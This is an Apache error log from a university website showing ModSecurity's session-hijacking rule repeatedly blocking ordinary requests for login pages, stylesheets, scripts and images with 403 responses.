[Mon Aug 28 08:01:30.452189 2023] [:error] [pid 38193] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvx6sCo-f0AAJUxupUAAAAJ"]
[Mon Aug 28 08:01:30.612487 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx6sCo-f0AAJS0EswAAAAW"]
[Mon Aug 28 08:01:34.312515 2023] [:error] [pid 38195] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx7sCo-f0AAJUz@gsAAAAM"]
[Mon Aug 28 08:01:35.723139 2023] [:error] [pid 38194] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx78Co-f0AAJUy1rYAAAAK"]
[Mon Aug 28 08:01:49.075831 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx-cCo-f0AAJSxYrcAAAAH"]
[Mon Aug 28 08:01:49.127269 2023] [:error] [pid 38113] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx-cCo-f0AAJTh5J0AAAAD"]
[Mon Aug 28 08:02:23.976998 2023] [:error] [pid 38065] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyH8Co-f0AAJSxYr8AAAAH"]
[Mon Aug 28 08:02:24.232754 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyIMCo-f0AAJTinVUAAAAE"]
[Mon Aug 28 08:02:42.209703 2023] [:error] [pid 37918] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyMsCo-f0AAJQeRn0AAAAP"]
[Mon Aug 28 08:02:42.457514 2023] [:error] [pid 38194] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyMsCo-f0AAJUy1sIAAAAK"]
[Mon Aug 28 08:02:48.963730 2023] [:error] [pid 37918] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvyOMCo-f0AAJQeRn8AAAAP"]
[Mon Aug 28 08:02:49.246669 2023] [:error] [pid 38059] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyOcCo-f0AAJSr2oUAAAAO"]
[Mon Aug 28 08:03:12.224495 2023] [:error] [pid 38195] [client 114.122.107.130] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyUMCo-f0AAJUz@iAAAAAM"]
[Mon Aug 28 08:03:12.725301 2023] [:error] [pid 37803] [client 114.122.107.150] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyUMCo-f0AAJOr91kAAAAL"]
[Mon Aug 28 08:03:15.812147 2023] [:error] [pid 38195] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvyU8Co-f0AAJUz@iIAAAAM"]
[Mon Aug 28 08:03:15.929100 2023] [:error] [pid 38060] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvyU8Co-f0AAJSsrYcAAAAQ"]
[Mon Aug 28 08:03:15.929179 2023] [:error] [pid 38149] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvyU8Co-f0AAJUFNOsAAAAA"]
[Mon Aug 28 08:03:15.995656 2023] [:error] [pid 37539] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvyU8Co-f0AAJKjZ38AAAAG"]
[Mon Aug 28 08:03:24.039277 2023] [:error] [pid 37803] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvyXMCo-f0AAJOr910AAAAL"]
[Mon Aug 28 08:03:27.422348 2023] [:error] [pid 38192] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvyX8Co-f0AAJUwn4cAAAAI"]
[Mon Aug 28 08:03:27.423202 2023] [:error] [pid 38114] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvyX8Co-f0AAJTinWQAAAAE"]
[Mon Aug 28 08:03:27.480882 2023] [:error] [pid 38196] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvyX8Co-f0AAJU0qVcAAAAD"]
[Mon Aug 28 08:03:27.481647 2023] [:error] [pid 37803] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvyX8Co-f0AAJOr918AAAAL"]
[Mon Aug 28 08:03:27.483016 2023] [:error] [pid 38075] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvyX8Co-f0AAJS7R10AAAAB"]
[Mon Aug 28 08:03:27.483700 2023] [:error] [pid 38060] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/teh_farah.png"] [unique_id "ZOvyX8Co-f0AAJSsrYsAAAAQ"]
[Mon Aug 28 08:03:27.513410 2023] [:error] [pid 38065] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvyX8Co-f0AAJSxYs0AAAAH"]
[Mon Aug 28 08:03:27.521312 2023] [:error] [pid 38114] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvyX8Co-f0AAJTinWUAAAAE"]
[Mon Aug 28 08:03:27.581314 2023] [:error] [pid 38075] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvyX8Co-f0AAJS7R14AAAAB"]
[Mon Aug 28 08:03:27.688585 2023] [:error] [pid 38060] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvyX8Co-f0AAJSsrYwAAAAQ"]
[Mon Aug 28 08:03:27.841280 2023] [:error] [pid 37539] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyX8Co-f0AAJKjZ4MAAAAG"]
[Mon Aug 28 08:03:28.378827 2023] [:error] [pid 38192] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyYMCo-f0AAJUwn4gAAAAI"]
[Mon Aug 28 08:04:09.709436 2023] [:error] [pid 38065] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvyicCo-f0AAJSxYtcAAAAH"]
[Mon Aug 28 08:04:11.416050 2023] [:error] [pid 38060] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvyi8Co-f0AAJSsrZUAAAAQ"]
[Mon Aug 28 08:04:11.699362 2023] [:error] [pid 38196] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg_form.png"] [unique_id "ZOvyi8Co-f0AAJU0qWAAAAAD"]
[Mon Aug 28 08:04:12.739339 2023] [:error] [pid 38065] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login2.png"] [unique_id "ZOvyjMCo-f0AAJSxYtgAAAAH"]
[Mon Aug 28 08:04:12.904460 2023] [:error] [pid 38196] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvyjMCo-f0AAJU0qWEAAAAD"]
[Mon Aug 28 08:04:43.111988 2023] [:error] [pid 38149] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyq8Co-f0AAJUFNPwAAAAA"]
[Mon Aug 28 08:04:43.171137 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyq8Co-f0AAJKjZ5MAAAAG"]
[Mon Aug 28 08:04:43.884667 2023] [:error] [pid 38149] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyq8Co-f0AAJUFNP0AAAAA"]
[Mon Aug 28 08:04:48.164618 2023] [:error] [pid 38196] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvysMCo-f0AAJU0qWcAAAAD"]
[Mon Aug 28 08:04:48.621630 2023] [:error] [pid 38059] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvysMCo-f0AAJSr2pgAAAAO"]
[Mon Aug 28 08:05:31.419157 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy28Co-f0AAJVXJZEAAAAJ"]
[Mon Aug 28 08:05:31.440830 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy28Co-f0AAJUFNQsAAAAA"]
[Mon Aug 28 08:05:31.443642 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy28Co-f0AAJSsraYAAAAQ"]
[Mon Aug 28 08:05:31.457416 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KgAAAAF"]
[Mon Aug 28 08:05:31.464269 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy28Co-f0AAJUwn5oAAAAI"]
[Mon Aug 28 08:05:31.464600 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy28Co-f0AAJQeRqIAAAAP"]
[Mon Aug 28 08:05:31.466158 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvy28Co-f0AAJUFNQwAAAAA"]
[Mon Aug 28 08:05:31.472689 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvy28Co-f0AAJVXJZIAAAAJ"]
[Mon Aug 28 08:05:31.483772 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvy28Co-f0AAJVZ9fEAAAAR"]
[Mon Aug 28 08:05:31.504445 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvy28Co-f0AAJVW8KkAAAAF"]
[Mon Aug 28 08:05:31.506258 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvy28Co-f0AAJVXJZMAAAAJ"]
[Mon Aug 28 08:05:31.514660 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvy28Co-f0AAJQeRqMAAAAP"]
[Mon Aug 28 08:05:31.515609 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvy28Co-f0AAJKjZ58AAAAG"]
[Mon Aug 28 08:05:31.516773 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvy28Co-f0AAJSsracAAAAQ"]
[Mon Aug 28 08:05:31.518472 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvy28Co-f0AAJVZ9fIAAAAR"]
[Mon Aug 28 08:05:31.537724 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvy28Co-f0AAJUwn5sAAAAI"]
[Mon Aug 28 08:05:31.541422 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KoAAAAF"]
[Mon Aug 28 08:05:31.550256 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvy28Co-f0AAJUFNQ0AAAAA"]
[Mon Aug 28 08:05:31.554629 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvy28Co-f0AAJVXJZQAAAAJ"]
[Mon Aug 28 08:05:31.556575 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvy28Co-f0AAJKjZ6AAAAAG"]
[Mon Aug 28 08:05:31.566833 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvy28Co-f0AAJUwn5wAAAAI"]
[Mon Aug 28 08:05:31.567299 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvy28Co-f0AAJSsragAAAAQ"]
